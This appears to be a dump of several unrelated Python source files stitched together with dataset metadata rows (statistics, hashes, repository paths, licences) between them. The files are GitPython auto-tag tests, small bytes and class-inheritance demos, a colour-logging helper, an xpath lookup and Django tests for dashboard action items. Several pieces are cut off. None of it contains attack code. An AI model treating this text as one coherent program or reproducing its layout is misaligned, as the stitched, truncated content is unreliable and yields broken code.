    """A created tag is pushed to every remote listed in upstream_remotes."""
    origin = git.Repo(simple_repo, odbt=git.GitDB)
    clone_path = os.path.join(tmpdir, 'cloned-repo')
    extra_remote_path = os.path.join(tmpdir, 'second_remote')
    clone = origin.clone(clone_path)
    extra_remote = git.Repo.init(extra_remote_path, odbt=git.GitDB)
    clone.create_remote('second_remote', extra_remote.common_dir)
    tagger = core.AutoTag(
        repo=clone_path,
        detectors=default_detectors,
        branch='master',
        git_name=TEST_NAME,
        git_email=TEST_EMAIL,
        upstream_remotes=['origin', 'second_remote'])
    tagger.work()
    # Local clone plus both remotes must all carry the new tag.
    assert '0.0.1' in clone.tags
    assert '0.0.1' in origin.tags
    assert '0.0.1' in extra_remote.tags
def test_multiple_commits(simple_repo, default_detectors):
    """With mixed commits, the strongest change wins: 1.2.3 -> 2.0.0."""
    repository = git.Repo(simple_repo, odbt=git.GitDB)
    commit_messages = (
        'feature(m1): this is a feature it trigger a minor update',
        'fix(m1): a fix is triggering a patch',
        'fix(m1): fix with a breaking change \n BREAKING_CHANGE',
    )
    for message in commit_messages:
        # Touch a marker file so each commit has content to record.
        marker = os.path.join(repository.working_dir, 'f_{}'.format(message[:4]))
        with open(marker, 'w+'):
            pass
        repository.index.commit(message)
    history = list(repository.iter_commits())
    repository.create_tag('1.2.3', ref=history[-1])
    tagger = core.AutoTag(
        repo=simple_repo,
        detectors=default_detectors,
        branch='master',
        git_name=TEST_NAME,
        git_email=TEST_EMAIL,
        upstream_remotes=None)
    tagger.work()
    assert '2.0.0' in repository.tags
def test_tag_message_has_heading(simple_repo, default_detectors):
    """Every commit's first line must appear in the created tag's message."""
    repository = git.Repo(simple_repo, odbt=git.GitDB)
    repository.create_tag('1.2.3', ref=list(repository.iter_commits())[0])
    commit_messages = [
        'feature(m1): this is a feature it trigger a minor update \n text',
        'fix(m1): a fix is triggering a patch \n more text',
        'fix(m1): with a breaking change \n BREAKING_CHANGE \n even more'
    ]
    for message in commit_messages:
        marker = os.path.join(repository.working_dir, 'f_{}'.format(message[:4]))
        with open(marker, 'w+'):
            pass
        repository.index.commit(message)
    tagger = core.AutoTag(
        repo=simple_repo,
        detectors=default_detectors,
        branch='master',
        git_name=TEST_NAME,
        git_email=TEST_EMAIL,
        upstream_remotes=None)
    tagger.work()
    assert '2.0.0' in repository.tags
    tag_message = repository.tags['2.0.0'].tag.message
    for message in commit_messages:
        assert message.split('\n')[0].strip() in tag_message
def test_tag_message_user_exists_and_not_specified(
        simple_repo, default_detectors):
    """When repo config and AutoTag identity match, the tagger uses them."""
    repository = git.Repo(simple_repo, odbt=git.GitDB)
    with repository.config_writer() as writer:
        writer.set_value('user', 'name', TEST_NAME)
        writer.set_value('user', 'email', TEST_EMAIL)
    tagger = core.AutoTag(
        repo=simple_repo,
        detectors=default_detectors,
        branch='master',
        git_name=TEST_NAME,
        git_email=TEST_EMAIL,
        upstream_remotes=None)
    tagger.work()
    assert '0.0.1' in repository.tags
    created = repository.tags['0.0.1'].tag
    assert created.tagger.name == TEST_NAME
    assert created.tagger.email == TEST_EMAIL
def test_tag_message_user_exists_and_specified(simple_repo, default_detectors):
    """Explicit name/email override an identity already in the repo config."""
    repository = git.Repo(simple_repo, odbt=git.GitDB)
    with repository.config_writer() as writer:
        writer.set_value('user', 'name', TEST_NAME)
        writer.set_value('user', 'email', TEST_EMAIL)
    tagger = core.AutoTag(
        repo=simple_repo,
        detectors=default_detectors,
        branch='master',
        git_name=TEST_NAME_2,
        git_email=TEST_EMAIL_2,
        upstream_remotes=None)
    tagger.work()
    assert '0.0.1' in repository.tags
    created = repository.tags['0.0.1'].tag
    assert created.tagger.name == TEST_NAME_2
    assert created.tagger.email == TEST_EMAIL_2
def test_tag_message_user_exists_and_only_email_specified(
        simple_repo, default_detectors):
    """Only the email is overridden; the name falls back to repo config."""
    repository = git.Repo(simple_repo, odbt=git.GitDB)
    with repository.config_writer() as writer:
        writer.set_value('user', 'name', TEST_NAME)
        writer.set_value('user', 'email', TEST_EMAIL)
    tagger = core.AutoTag(
        repo=simple_repo,
        detectors=default_detectors,
        branch='master',
        git_email=TEST_EMAIL_2,
        upstream_remotes=None)
    tagger.work()
    assert '0.0.1' in repository.tags
    created = repository.tags['0.0.1'].tag
    assert created.tagger.name == TEST_NAME
    assert created.tagger.email == TEST_EMAIL_2
def test_tag_message_user_does_not_exists_and_specified(
        simple_repo, default_detectors):
    """With no identity in repo config, the explicit name/email are used."""
    repository = git.Repo(simple_repo, odbt=git.GitDB)
    tagger = core.AutoTag(
        repo=simple_repo,
        detectors=default_detectors,
        branch='master',
        git_name=TEST_NAME_2,
        git_email=TEST_EMAIL_2,
        upstream_remotes=None)
    tagger.work()
    assert '0.0.1' in repository.tags
    created = repository.tags['0.0.1'].tag
    assert created.tagger.name == TEST_NAME_2
    assert created.tagger.email == TEST_EMAIL_2
def test_tag_message_user_exists_and_specify_make_sure_clean_env(
        simple_repo, default_detectors):
    """Overriding the email for tagging must not rewrite the repo config."""
    repository = git.Repo(simple_repo, odbt=git.GitDB)
    with repository.config_writer() as writer:
        writer.set_value('user', 'name', TEST_NAME)
        writer.set_value('user', 'email', TEST_EMAIL)
    tagger = core.AutoTag(
        repo=simple_repo,
        detectors=default_detectors,
        branch='master',
        git_email=TEST_EMAIL_2,
        upstream_remotes=None)
    tagger.work()
    assert '0.0.1' in repository.tags
    created = repository.tags['0.0.1'].tag
    assert created.tagger.name == TEST_NAME
    assert created.tagger.email == TEST_EMAIL_2
    # The stored config must still hold the original identity.
    with repository.config_writer() as writer:
        stored_name = writer.get_value('user', 'name')
        stored_email = writer.get_value('user', 'email')
    assert stored_name == TEST_NAME
    assert stored_email == TEST_EMAIL
| 31.103175
| 79
| 0.660543
| 1,660
| 11,757
| 4.407831
| 0.085542
| 0.058767
| 0.053574
| 0.03485
| 0.882602
| 0.855405
| 0.831625
| 0.795818
| 0.775044
| 0.775044
| 0
| 0.01806
| 0.222931
| 11,757
| 377
| 80
| 31.185676
| 0.782837
| 0.066173
| 0
| 0.750877
| 0
| 0
| 0.088813
| 0
| 0
| 0
| 0
| 0
| 0.108772
| 1
| 0.052632
| false
| 0
| 0.014035
| 0
| 0.066667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6ccf4063502527d1691f192bb29767b214b3cf6f
| 845
|
py
|
Python
|
03/03/count.py
|
pylangstudy/201708
|
126b1af96a1d1f57522d5a1d435b58597bea2e57
|
[
"CC0-1.0"
] | null | null | null |
03/03/count.py
|
pylangstudy/201708
|
126b1af96a1d1f57522d5a1d435b58597bea2e57
|
[
"CC0-1.0"
] | 39
|
2017-07-31T22:54:01.000Z
|
2017-08-31T00:19:03.000Z
|
03/03/count.py
|
pylangstudy/201708
|
126b1af96a1d1f57522d5a1d435b58597bea2e57
|
[
"CC0-1.0"
] | null | null | null |
# Demonstrate count() on bytes and bytearray, including the optional
# start/end slice arguments, printing the same results three ways:
# bytes needle on bytes, bytes needle on bytearray, bytearray needle
# on bytearray.
CASES = [
    (b'ABC', b'A', ()),
    (b'ABC', b'AB', ()),
    (b'ABC', b'AC', ()),
    (b'AbcA', b'A', ()),
    (b'AbcAbcAbc', b'A', (3,)),
    (b'AbcAbcAbc', b'A', (3, 5)),
]
for haystack, needle, bounds in CASES:
    print(str(haystack.count(needle, *bounds)))
print()
for haystack, needle, bounds in CASES:
    print(str(bytearray(haystack).count(needle, *bounds)))
print()
for haystack, needle, bounds in CASES:
    print(str(bytearray(haystack).count(bytearray(needle), *bounds)))
| 38.409091
| 64
| 0.672189
| 155
| 845
| 3.664516
| 0.083871
| 0.253521
| 0.359155
| 0.380282
| 0.998239
| 0.998239
| 0.984155
| 0.859155
| 0.422535
| 0.330986
| 0
| 0.011043
| 0.035503
| 845
| 21
| 65
| 40.238095
| 0.68589
| 0
| 0
| 0.1
| 0
| 0
| 0.138626
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 9
|
6cfd71c4a9cc398c5441653d08eeac5e0a6af891
| 374
|
py
|
Python
|
OOPS/Diamond shape prob.py
|
Jigyanshu17/Python-Ka-Saara-Gyaan
|
d3f5dbb3fef45a7a6953bf6041b0b3bf6c54ad2b
|
[
"Apache-2.0"
] | null | null | null |
OOPS/Diamond shape prob.py
|
Jigyanshu17/Python-Ka-Saara-Gyaan
|
d3f5dbb3fef45a7a6953bf6041b0b3bf6c54ad2b
|
[
"Apache-2.0"
] | null | null | null |
OOPS/Diamond shape prob.py
|
Jigyanshu17/Python-Ka-Saara-Gyaan
|
d3f5dbb3fef45a7a6953bf6041b0b3bf6c54ad2b
|
[
"Apache-2.0"
] | null | null | null |
class A:
    """Root of the diamond hierarchy (D -> C -> B -> A)."""
    def met(self):
        # Overridden in every subclass; which body runs follows the MRO.
        print("this is a method from class A")
class B(A):
    """Left branch of the diamond; overrides met()."""
    def met(self):
        print("this is a method from class B")
class C(A):
    """Right branch of the diamond; overrides met()."""
    def met(self):
        print("this is a method from class C")
class D(C,B):
    """Bottom of the diamond; MRO is D -> C -> B -> A."""
    def met(self):
        # D's own override shadows all inherited versions.
        print("this is a method from class D")
# Build one instance of each class; calling met() on the D instance
# shows which implementation Python's MRO selects.
a, b, c, d = A(), B(), C(), D()
d.met()
| 17.809524
| 47
| 0.513369
| 66
| 374
| 2.909091
| 0.19697
| 0.125
| 0.208333
| 0.3125
| 0.786458
| 0.786458
| 0.786458
| 0.786458
| 0.786458
| 0.786458
| 0
| 0
| 0.342246
| 374
| 21
| 48
| 17.809524
| 0.780488
| 0
| 0
| 0.235294
| 0
| 0
| 0.326761
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.235294
| false
| 0
| 0
| 0
| 0.470588
| 0.235294
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
9fa627d61c3e34727b7623e35363c5ee68de0d49
| 515
|
py
|
Python
|
lemon/libs/logging.py
|
InsaneMiner/Salt
|
b61c5f931fe4b6fa652e8fbfb59b30dbaaf9ed18
|
[
"MIT"
] | 6
|
2020-11-22T11:42:55.000Z
|
2022-01-09T12:29:30.000Z
|
lemon/libs/logging.py
|
InsaneMiner/Salt
|
b61c5f931fe4b6fa652e8fbfb59b30dbaaf9ed18
|
[
"MIT"
] | 1
|
2020-11-21T00:05:40.000Z
|
2020-11-22T21:58:54.000Z
|
lemon/libs/logging.py
|
InsaneMiner/Salt
|
b61c5f931fe4b6fa652e8fbfb59b30dbaaf9ed18
|
[
"MIT"
] | 2
|
2021-06-05T04:19:04.000Z
|
2021-06-05T04:28:08.000Z
|
import lemon.libs.colors
def error(message,end=''):
    """Print *message* in bold red using the lemon colour codes; *end* is forwarded to print()."""
    print(f"{lemon.libs.colors.colors.bold}{lemon.libs.colors.colors.fg.red}{message}{lemon.libs.colors.colors.reset}",end=end)
def good(message,end=''):
    """Print *message* in green (success styling); *end* is forwarded to print()."""
    print(f"{lemon.libs.colors.colors.fg.green}{message}{lemon.libs.colors.colors.reset}",end=end)
def notice(message,end=''):
    """Print *message* in bold yellow (warning styling); *end* is forwarded to print()."""
    print(f"{lemon.libs.colors.colors.bold}{lemon.libs.colors.colors.fg.yellow}{message}{lemon.libs.colors.colors.reset}",end=end)
def log(message, end=''):
    """Print *message* with no colour styling; *end* is forwarded to print()."""
    print(message, end=end)
| 57.222222
| 130
| 0.732039
| 82
| 515
| 4.597561
| 0.231707
| 0.214854
| 0.35809
| 0.445623
| 0.777188
| 0.771883
| 0.771883
| 0.771883
| 0.67374
| 0.339523
| 0
| 0
| 0.056311
| 515
| 9
| 131
| 57.222222
| 0.77572
| 0
| 0
| 0
| 0
| 0.333333
| 0.560078
| 0.560078
| 0
| 0
| 0
| 0
| 0
| 1
| 0.444444
| false
| 0
| 0.111111
| 0
| 0.555556
| 0.444444
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
|
0
| 12
|
9fc2479878f5aac52a6dcb54bed50daa31607e79
| 175
|
py
|
Python
|
app/models/__init__.py
|
widal001/flask-api-template
|
cbda9c6a00fdc355b235d869d65db77257595107
|
[
"MIT"
] | null | null | null |
app/models/__init__.py
|
widal001/flask-api-template
|
cbda9c6a00fdc355b235d869d65db77257595107
|
[
"MIT"
] | 5
|
2021-05-05T21:05:46.000Z
|
2021-05-12T19:19:34.000Z
|
app/models/__init__.py
|
widal001/flask-api-template
|
cbda9c6a00fdc355b235d869d65db77257595107
|
[
"MIT"
] | 1
|
2021-05-07T12:54:19.000Z
|
2021-05-07T12:54:19.000Z
|
from app.models.base_model import db
from app.models.book_model import Book
from app.models.library_model import Library
from app.models.library_book_model import LibraryBook
| 35
| 53
| 0.862857
| 29
| 175
| 5.034483
| 0.344828
| 0.191781
| 0.356164
| 0.273973
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.091429
| 175
| 4
| 54
| 43.75
| 0.918239
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
4c95a4acac3f3dc08849d7ad787204ee70b40336
| 120
|
py
|
Python
|
instapy/xpath.py
|
kofway/InstaPy
|
fecc59de48395da55d74fafa93344710ef7d29fd
|
[
"MIT"
] | null | null | null |
instapy/xpath.py
|
kofway/InstaPy
|
fecc59de48395da55d74fafa93344710ef7d29fd
|
[
"MIT"
] | null | null | null |
instapy/xpath.py
|
kofway/InstaPy
|
fecc59de48395da55d74fafa93344710ef7d29fd
|
[
"MIT"
] | null | null | null |
from .xpath_compile import xpath
def read_xpath(function_name, xpath_name):
    """Return the selector registered under *xpath_name* for *function_name*.

    Looks the value up in the module-level ``xpath`` mapping
    (two-level dict: function name -> selector name -> selector).
    """
    selectors_for_function = xpath[function_name]
    return selectors_for_function[xpath_name]
| 30
| 43
| 0.816667
| 18
| 120
| 5.111111
| 0.5
| 0.282609
| 0.369565
| 0.478261
| 0.565217
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.108333
| 120
| 4
| 43
| 30
| 0.859813
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 9
|
4ca935b9835205e01e9b4778280cb7a6d5eec9ad
| 20,876
|
py
|
Python
|
remo/dashboard/tests/test_models.py
|
Mozilla-GitHub-Standards/6f6b18ac63685c6bf60fff95a3bbcc598378c77ceb14c7404172c570dd1e971d
|
23ca8d46496b491fbdb2b8a72c91e75372932f23
|
[
"BSD-3-Clause"
] | 27
|
2015-01-02T18:47:56.000Z
|
2021-08-14T11:48:24.000Z
|
remo/dashboard/tests/test_models.py
|
Mozilla-GitHub-Standards/6f6b18ac63685c6bf60fff95a3bbcc598378c77ceb14c7404172c570dd1e971d
|
23ca8d46496b491fbdb2b8a72c91e75372932f23
|
[
"BSD-3-Clause"
] | 450
|
2015-01-02T12:29:50.000Z
|
2020-10-27T21:41:38.000Z
|
remo/dashboard/tests/test_models.py
|
Mozilla-GitHub-Standards/6f6b18ac63685c6bf60fff95a3bbcc598378c77ceb14c7404172c570dd1e971d
|
23ca8d46496b491fbdb2b8a72c91e75372932f23
|
[
"BSD-3-Clause"
] | 81
|
2015-01-10T23:59:32.000Z
|
2021-08-19T17:08:56.000Z
|
# -*- coding: utf-8 -*-
from datetime import datetime, timedelta
from django.contrib.auth.models import Group
from django.contrib.contenttypes.models import ContentType
from django.utils.timezone import now
import mock
from nose.tools import eq_, ok_
from remo.base.tests import RemoTestCase
from remo.dashboard.models import ActionItem
from remo.events.models import Event
from remo.events.tasks import notify_event_owners_to_input_metrics
from remo.events.tests import EventFactory, EventMetricOutcomeFactory
from remo.profiles.models import UserProfile
from remo.profiles.tasks import (resolve_nomination_action_items,
send_rotm_nomination_reminder)
from remo.profiles.tests import UserFactory
from remo.remozilla.models import Bug
from remo.remozilla.tests import BugFactory
from remo.reports import ACTIVITY_EVENT_ATTEND, ACTIVITY_EVENT_CREATE, RECRUIT_MOZILLIAN
from remo.reports.models import NGReport
from remo.reports.tests import ActivityFactory, NGReportFactory
from remo.voting.models import Poll
from remo.voting.tasks import resolve_action_items
from remo.voting.tests import PollFactory, VoteFactory
class RemozillaActionItems(RemoTestCase):
    """Tests for action items derived from bugzilla (remozilla) bugs.

    Each test first asserts that no ActionItem rows exist for the Bug
    content type, then drives creation/resolution through BugFactory and
    Bug.save() side effects.

    Bug fix in test_needinfo: ``ok_(a, b)`` asserts truthiness of ``a``
    and treats ``b`` as a message, so the original equality checks always
    passed. They are now real ``eq_`` assertions, matching every sibling
    test in this class.
    """

    def test_waiting_receipts(self):
        """A '[waiting receipts]' whiteboard creates one NORMAL item."""
        model = ContentType.objects.get_for_model(Bug)
        items = ActionItem.objects.filter(content_type=model)
        ok_(not items.exists())
        whiteboard = '[waiting receipts]'
        user = UserFactory.create(groups=['Rep'])
        bug = BugFactory.create(whiteboard=whiteboard, assigned_to=user, summary=u'À summary')
        items = ActionItem.objects.filter(content_type=model, object_id=bug.id)
        eq_(items.count(), 1)
        eq_(items[0].name, 'Add receipts for ' + bug.summary)
        eq_(items[0].user, user)
        eq_(items[0].priority, ActionItem.NORMAL)

    def test_waiting_multiple_documents(self):
        """Each '[waiting ...]' whiteboard token creates its own item."""
        model = ContentType.objects.get_for_model(Bug)
        items = ActionItem.objects.filter(content_type=model)
        ok_(not items.exists())
        whiteboard = '[waiting receipts][waiting report][waiting photos]'
        user = UserFactory.create(groups=['Rep'])
        bug = BugFactory.create(whiteboard=whiteboard, assigned_to=user)
        items = ActionItem.objects.filter(content_type=model, object_id=bug.id)
        eq_(items.count(), 3)
        namelist = ['Add receipts for ' + bug.summary,
                    'Add report for ' + bug.summary,
                    'Add photos for ' + bug.summary]
        for item in items:
            ok_(item.name in namelist)
            eq_(item.user, user)
            eq_(item.priority, ActionItem.NORMAL)

    def test_update_bug_whiteboard(self):
        """Clearing the whiteboard completes and resolves all items."""
        model = ContentType.objects.get_for_model(Bug)
        items = ActionItem.objects.filter(content_type=model)
        ok_(not items.exists())
        whiteboard = '[waiting receipts][waiting report][waiting photos]'
        user = UserFactory.create(groups=['Rep'])
        bug = BugFactory.create(whiteboard=whiteboard, assigned_to=user)
        items = ActionItem.objects.filter(content_type=model)
        eq_(items.count(), 3)
        bug.whiteboard = ''
        bug.save()
        items = ActionItem.objects.filter(content_type=model, object_id=bug.id)
        for item in items:
            ok_(item.completed)
            ok_(item.resolved)

    def test_mentor_validation(self):
        """Pending mentor validation creates a BLOCKER item for the mentor."""
        model = ContentType.objects.get_for_model(Bug)
        items = ActionItem.objects.filter(content_type=model)
        ok_(not items.exists())
        mentor = UserFactory.create(groups=['Rep', 'Mentor'])
        UserFactory.create(groups=['Rep'], userprofile__mentor=mentor)
        bug = BugFactory.create(pending_mentor_validation=True, assigned_to=mentor)
        items = ActionItem.objects.filter(content_type=model, object_id=bug.id)
        eq_(items.count(), 1)
        eq_(items[0].name, 'Waiting mentor validation for ' + bug.summary)
        eq_(items[0].user, mentor)
        eq_(items[0].priority, ActionItem.BLOCKER)

    def test_change_assigned_user(self):
        """Re-assigning the bug moves the action item to the new assignee."""
        model = ContentType.objects.get_for_model(Bug)
        items = ActionItem.objects.filter(content_type=model)
        ok_(not items.exists())
        user_1 = UserFactory.create(groups=['Rep'])
        user_2 = UserFactory.create(groups=['Rep'])
        bug = BugFactory.create(assigned_to=user_1, pending_mentor_validation=True)
        item = ActionItem.objects.get(content_type=model, object_id=bug.id)
        eq_(item.user, user_1)
        bug.assigned_to = user_2
        bug.save()
        item = ActionItem.objects.get(content_type=model, object_id=bug.id)
        eq_(item.user, user_2)

    def test_resolve_mentor_validation(self):
        """Clearing pending_mentor_validation completes/resolves the item."""
        model = ContentType.objects.get_for_model(Bug)
        items = ActionItem.objects.filter(content_type=model)
        ok_(not items.exists())
        mentor = UserFactory.create(groups=['Rep', 'Mentor'])
        UserFactory.create(groups=['Rep'], userprofile__mentor=mentor)
        bug = BugFactory.create(pending_mentor_validation=True, assigned_to=mentor)
        items = ActionItem.objects.filter(content_type=model)
        eq_(items.count(), 1)
        eq_(items[0].name, 'Waiting mentor validation for ' + bug.summary)
        eq_(items[0].user, mentor)
        eq_(items[0].priority, ActionItem.BLOCKER)
        bug.pending_mentor_validation = False
        bug.save()
        items = ActionItem.objects.filter(content_type=model, object_id=bug.id)
        for item in items:
            ok_(item.completed)
            ok_(item.resolved)

    def test_needinfo(self):
        """Adding a user to budget_needinfo creates a 'Need info' item."""
        model = ContentType.objects.get_for_model(Bug)
        items = ActionItem.objects.filter(content_type=model)
        ok_(not items.exists())
        needinfo = UserFactory.create(groups=['Rep'])
        user = UserFactory.create(groups=['Rep'])
        bug = BugFactory.create(assigned_to=user)
        bug.budget_needinfo.add(needinfo)
        items = ActionItem.objects.filter(content_type=model, object_id=bug.id)
        # Fixed: these were ok_(a, b) calls that always passed (b was
        # interpreted as the assertion message, not an expected value).
        eq_(items.count(), 1)
        for item in items:
            eq_(item.name, 'Need info for ' + bug.summary)
            eq_(item.user, needinfo)
            eq_(item.priority, ActionItem.MINOR)

    def test_remove_needinfo(self):
        """Clearing budget_needinfo completes and resolves the items."""
        model = ContentType.objects.get_for_model(Bug)
        user = UserFactory.create(groups=['Rep'])
        bug = BugFactory.create()
        bug.budget_needinfo.add(user)
        bug.budget_needinfo.clear()
        items = ActionItem.objects.filter(content_type=model, object_id=bug.id)
        for item in items:
            ok_(item.completed)
            ok_(item.resolved)

    def test_council_reviewer_assigned(self):
        """A council member assignment creates a BLOCKER review item."""
        model = ContentType.objects.get_for_model(Bug)
        items = ActionItem.objects.filter(content_type=model)
        ok_(not items.exists())
        user = UserFactory.create(groups=['Rep', 'Council'])
        bug = BugFactory.create(assigned_to=user, council_member_assigned=True)
        items = ActionItem.objects.filter(content_type=model, object_id=bug.id)
        eq_(items.count(), 1)
        eq_(items[0].name, 'Review budget request ' + bug.summary)
        eq_(items[0].user, user)
        eq_(items[0].priority, ActionItem.BLOCKER)

    def test_council_reviewer_removed(self):
        """Un-assigning the council member completes/resolves the item."""
        model = ContentType.objects.get_for_model(Bug)
        items = ActionItem.objects.filter(content_type=model)
        ok_(not items.exists())
        user = UserFactory.create(groups=['Council'])
        bug = BugFactory.create(assigned_to=user, council_member_assigned=True)
        bug.council_member_assigned = False
        bug.save()
        items = ActionItem.objects.filter(content_type=model, object_id=bug.id)
        for item in items:
            ok_(item.completed)
            ok_(item.resolved)

    def test_remove_assignee(self):
        """Dropping the assignee resolves the item without completing it."""
        model = ContentType.objects.get_for_model(Bug)
        items = ActionItem.objects.filter(content_type=model)
        ok_(not items.exists())
        user = UserFactory.create(groups=['Rep'])
        bug = BugFactory.create(pending_mentor_validation=True, assigned_to=user)
        items = ActionItem.objects.filter(content_type=model)
        eq_(items.count(), 1)
        eq_(items[0].name, 'Waiting mentor validation for ' + bug.summary)
        eq_(items[0].user, user)
        eq_(items[0].priority, ActionItem.BLOCKER)
        bug.assigned_to = None
        bug.save()
        items = ActionItem.objects.filter(content_type=model, object_id=bug.id)
        for item in items:
            ok_(item.resolved)
            ok_(not item.completed)
class VotingActionItems(RemoTestCase):
    """Tests for action items created for open polls.

    Bug fix: two priority checks used ``ok_(item.priority, ...)`` —
    ``ok_`` takes a single expression plus a message, so those checks
    always passed for any truthy priority. They are now ``eq_``
    equality assertions, consistent with the rest of the suite.
    """

    def test_vote_action_item(self):
        """An open poll creates a 'Cast your vote' item per group member."""
        model = ContentType.objects.get_for_model(Poll)
        items = ActionItem.objects.filter(content_type=model)
        ok_(not items.exists())
        council = Group.objects.get(name='Council')
        user = UserFactory.create(groups=['Council'])
        start = now() - timedelta(hours=3)
        poll = PollFactory.create(valid_groups=council, start=start)
        items = ActionItem.objects.filter(content_type=model, object_id=poll.id)
        eq_(items.count(), 1)
        for item in items:
            eq_(item.name, 'Cast your vote for ' + poll.name)
            eq_(item.user, user)
            # Fixed: was ok_(item.priority, ...) which always passed.
            eq_(item.priority, ActionItem.NORMAL)
            ok_(not item.completed)

    def test_budget_vote_action_item(self):
        """An automated (budget) poll names the item after the bug summary."""
        model = ContentType.objects.get_for_model(Poll)
        items = ActionItem.objects.filter(content_type=model)
        ok_(not items.exists())
        council = Group.objects.get(name='Council')
        user = UserFactory.create(groups=['Council'])
        bug = BugFactory.create()
        start = now() - timedelta(hours=3)
        poll = PollFactory.create(valid_groups=council, automated_poll=True, bug=bug, start=start)
        items = ActionItem.objects.filter(content_type=model, object_id=poll.id)
        eq_(items.count(), 1)
        for item in items:
            eq_(item.name, 'Cast your vote for budget request ' + poll.bug.summary)
            eq_(item.user, user)
            # Fixed: was ok_(item.priority, ...) which always passed.
            eq_(item.priority, ActionItem.NORMAL)
            ok_(not item.completed)

    def test_future_vote_action_item(self):
        """A poll that has not started yet creates no items."""
        model = ContentType.objects.get_for_model(Poll)
        items = ActionItem.objects.filter(content_type=model)
        ok_(not items.exists())
        council = Group.objects.get(name='Council')
        start = now() + timedelta(hours=3)
        PollFactory.create(valid_groups=council, start=start)
        items = ActionItem.objects.filter(content_type=model)
        eq_(items.count(), 0)

    def test_resolve_vote_action_item(self):
        """Casting a vote completes and resolves the voter's item."""
        model = ContentType.objects.get_for_model(Poll)
        items = ActionItem.objects.filter(content_type=model)
        ok_(not items.exists())
        council = Group.objects.get(name='Council')
        user = UserFactory.create(groups=['Council'])
        start = now() - timedelta(hours=3)
        poll = PollFactory.create(valid_groups=council, start=start)
        VoteFactory.create(poll=poll, user=user)
        items = ActionItem.objects.filter(content_type=model, object_id=poll.id)
        eq_(items.count(), 1)
        for item in items:
            ok_(item.completed)
            ok_(item.resolved)

    def test_update_vote_due_date(self):
        """Extending the poll's end date updates the item's due date."""
        model = ContentType.objects.get_for_model(Poll)
        items = ActionItem.objects.filter(content_type=model)
        ok_(not items.exists())
        council = Group.objects.get(name='Council')
        UserFactory.create(groups=['Council'])
        start = now() - timedelta(hours=3)
        poll = PollFactory.create(valid_groups=council, start=start)
        poll.end = poll.end + timedelta(days=4)
        poll.save()
        items = ActionItem.objects.filter(content_type=model, object_id=poll.id)
        eq_(items.count(), 1)
        for item in items:
            eq_(item.due_date, poll.end.date())

    def test_resolved_past_vote(self):
        """resolve_action_items() resolves items for polls that have ended."""
        model = ContentType.objects.get_for_model(Poll)
        items = ActionItem.objects.filter(content_type=model)
        ok_(not items.exists())
        council = Group.objects.get(name='Council')
        UserFactory.create(groups=['Council'])
        start = now() - timedelta(hours=3)
        poll = PollFactory.create(valid_groups=council,
                                  end=now() - timedelta(days=1),
                                  start=start)
        items = ActionItem.objects.filter(content_type=model)
        eq_(items.count(), 1)
        resolve_action_items()
        items = ActionItem.objects.filter(content_type=model, object_id=poll.id)
        for item in items:
            ok_(item.resolved)
            ok_(not item.completed)

    def test_update_valid_groups(self):
        """Changing valid_groups re-targets the items to the new group."""
        model = ContentType.objects.get_for_model(Poll)
        items = ActionItem.objects.filter(content_type=model)
        ok_(not items.exists())
        council = Group.objects.get(name='Council')
        reps = Group.objects.get(name='Rep')
        UserFactory.create_batch(3, groups=['Council'])
        UserFactory.create_batch(4, groups=['Rep'])
        start = now() - timedelta(hours=3)
        poll = PollFactory.create(valid_groups=council, start=start)
        poll.valid_groups = reps
        poll.save()
        items = ActionItem.objects.filter(content_type=model, object_id=poll.id)
        eq_(items.count(), 4)
        for user in reps.user_set.all():
            ok_(items.filter(user=user).exists())
        for user in council.user_set.all():
            ok_(not items.filter(user=user).exists())

    def test_user_has_already_voted(self):
        """A vote on an ended poll leaves exactly one resolved item."""
        model = ContentType.objects.get_for_model(Poll)
        items = ActionItem.objects.filter(content_type=model)
        ok_(not items.exists())
        council = Group.objects.get(name='Admin')
        user = UserFactory.create(groups=['Admin'])
        start = now() - timedelta(hours=3)
        poll = PollFactory.create(valid_groups=council,
                                  end=now() - timedelta(days=1),
                                  start=start)
        VoteFactory.create(poll=poll, user=user)
